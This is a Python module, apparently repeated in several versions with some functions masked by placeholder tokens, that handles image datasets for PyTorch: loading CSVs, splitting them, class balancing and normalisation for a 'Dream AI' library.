c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not 
train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = 
data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop 
in crops])), transforms.Lambda(lambda crops:\n                torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n                0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n        else:\n            tta_tfms = None\n        if not bal_tfms:\n            bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n                self.val_name: None, self.test_name: None}\n        else:\n            bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n                test_name: None}\n        if obj:\n            resize_transform = transforms.Resize(s)\n        else:\n            resize_transform = transforms.Resize(s)\n        if not tfms:\n            tfms = [resize_transform, transforms.ToTensor(), transforms.\n                Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n        else:\n            tfms_temp = [resize_transform, transforms.ToTensor(),\n                transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n                0.225])]\n            tfms_temp[1:1] = tfms\n            tfms = tfms_temp\n        print(tfms)\n        data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n            Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n            0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n            transforms.Resize(s), transforms.ToTensor(), transforms.\n            Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n        temp_tfms = [resize_transform, transforms.ToTensor()]\n        temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n            data_dfs[self.tr_name], temp_tfms)\n        self.img_mean, self.img_std = get_img_stats(temp_dataset,\n            stats_percentage)\n        data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n            -1].std = self.img_mean, self.img_std\n        data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n            ][-1].std = self.img_mean, self.img_std\n        data_transforms[self.test_name][-1].mean, data_transforms[self.\n            test_name][-1].std = self.img_mean, self.img_std\n        if balance:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n                class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n                val_name, self.test_name]}\n        else:\n            image_datasets = {x: dataset(os.path.join(data_dir, self.\n                tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n                self.tr_name, self.val_name, self.test_name]}\n        dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n            batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n            [self.tr_name, self.val_name, self.test_name]}\n        dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n            self.val_name, self.test_name]}\n        self.image_datasets, self.dataloaders, self.dataset_sizes = (\n            image_datasets, dataloaders, dataset_sizes)\n        return image_datasets, dataloaders, dataset_sizes\n\n    def imshow(self, inp, title=None):\n        \"\"\"Imshow for Tensor.\"\"\"\n        inp = self.denorm_img(inp)\n        plt.imshow(inp)\n        if title:\n            plt.title(title)\n        plt.pause(0.001)\n\n    def denorm_img(self, inp, calculate=False):\n        inp = inp.numpy().transpose((1, 2, 0))\n        if calculate:\n            mean = np.mean(inp)\n            std = np.std(inp)\n        else:\n            mean = self.img_mean.numpy()\n            std = self.img_std.numpy()\n        inp = std * inp + mean\n        inp = np.clip(inp, 0, 1)\n        return inp\n\n    def show_data(self, folder_name='train', size=(64, 64), bs=5):\n        self.get_data(s=size, bs=bs)\n        batch = next(iter(self.dataloaders[folder_name]))\n        inputs, classes = batch[0], batch[1]\n        out = torchvision.utils.make_grid(inputs)\n        if self.reg:\n            print(classes)\n            self.imshow(out, title=[x for x in classes])\n        elif self.multi_label:\n            self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n                torch.LongTensor))] for x in classes])\n        else:\n            self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import 
token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, 
data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n 
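# right-align each box row inside the fixed-width array, zero-padding\n                # on the left: with max(lengths) = 8, a single box [x0, y0, x1, y1]\n                # is stored as [0, 0, 0, 0, x0, y0, x1, y1].\n                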
zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, 
num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in 
[self.tr_name,\n            self.val_name, self.test_name]}\n        self.image_datasets, self.dataloaders, self.dataset_sizes = (\n            image_datasets, dataloaders, dataset_sizes)\n        return image_datasets, dataloaders, dataset_sizes\n\n    def imshow(self, inp, title=None):\n        \"\"\"Imshow for Tensor.\"\"\"\n        inp = self.denorm_img(inp)\n        plt.imshow(inp)\n        if title:\n            plt.title(title)\n        plt.pause(0.001)\n\n    def denorm_img(self, inp, calculate=False):\n        inp = inp.numpy().transpose((1, 2, 0))\n        if calculate:\n            mean = np.mean(inp)\n            std = np.std(inp)\n        else:\n            mean = self.img_mean.numpy()\n            std = self.img_std.numpy()\n        inp = std * inp + mean\n        inp = np.clip(inp, 0, 1)\n        return inp\n\n    def show_data(self, folder_name='train', size=(64, 64), bs=5):\n        self.get_data(s=size, bs=bs)\n        batch = next(iter(self.dataloaders[folder_name]))\n        inputs, classes = batch[0], batch[1]\n        out = torchvision.utils.make_grid(inputs)\n        if self.reg:\n            print(classes)\n            self.imshow(out, title=[x for x in classes])\n        elif self.multi_label:\n            self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n                torch.LongTensor))] for x in classes])\n        else:\n            self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n    def __init__(self, data_dir, data, transforms_=None, obj=False,\n        minorities=None, diffs=None, bal_tfms=None):\n        self.data_dir = data_dir\n        self.data = data\n        self.transforms_ = transforms_\n        self.tfms = None\n        self.obj = obj\n        self.minorities = minorities\n        self.diffs = diffs\n        self.bal_tfms = bal_tfms\n        assert transforms_ is not None, print('Please pass some transforms.')\n\n    def __len__(self):\n        return len(self.data)\n\n    def __getitem__(self, index):\n        img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n        img = Image.open(img_path)\n        img = img.convert('RGB')\n        img = torchvision.transforms.functional.to_grayscale(img,\n            num_output_channels=3)\n        y = self.data.iloc[index, 1]\n        if self.minorities and self.bal_tfms:\n            if y in self.minorities:\n                if hasattr(self.bal_tfms, 'transforms'):\n                    for tr in self.bal_tfms.transforms:\n                        tr.p = self.diffs[y]\n                    l = [self.bal_tfms]\n                    l.extend(self.transforms_)\n                    self.tfms = transforms.Compose(l)\n                else:\n                    for t in self.bal_tfms:\n                        t.p = self.diffs[y]\n                    self.transforms_[1:1] = self.bal_tfms\n                    self.tfms = transforms.Compose(self.transforms_)\n            else:\n                self.tfms = transforms.Compose(self.transforms_)\n        else:\n            self.tfms = transforms.Compose(self.transforms_)\n        x = self.tfms(img)\n        if self.obj:\n            s = x.size()[1]\n            if isinstance(s, tuple):\n                s = s[0]\n            row_scale = s / img.size[0]\n            col_scale = s / img.size[1]\n            y = rescale_bbox(y, row_scale, col_scale)\n            y.squeeze_()\n            y2 = self.data.iloc[index, 2]\n            y = y, y2\n        return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n    def __init__(self, root, transform=None, target_transform=None, loader=\n        default_loader, minorities=None, diffs=None, bal_tfms=None,\n        tta_tfms=None):\n        super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n            transform=transform, target_transform=target_transform)\n        self.imgs = self.samples\n        self.minorities = minorities\n        self.diffs = diffs\n        self.bal_tfms = bal_tfms\n        self.tta_tfms = tta_tfms\n        self.tfms = None\n\n    def __getitem__(self, index):\n        path, target = self.samples[index]\n        sample = self.loader(path)\n        if self.transform:\n            if self.minorities and self.bal_tfms:\n                if target in self.minorities:\n                    if hasattr(self.bal_tfms, 'transforms'):\n                        for tr in self.bal_tfms.transforms:\n                            tr.p = self.diffs[target]\n                        l = [self.bal_tfms]\n                        l.extend(self.transform)\n                        
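# the balancing transform runs first, with probability diffs[target] =\n                        # 1 - count / max_count from get_minorities, so e.g. a class with\n                        # 10 samples against a 100-sample majority is augmented with p = 0.9.\n                        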
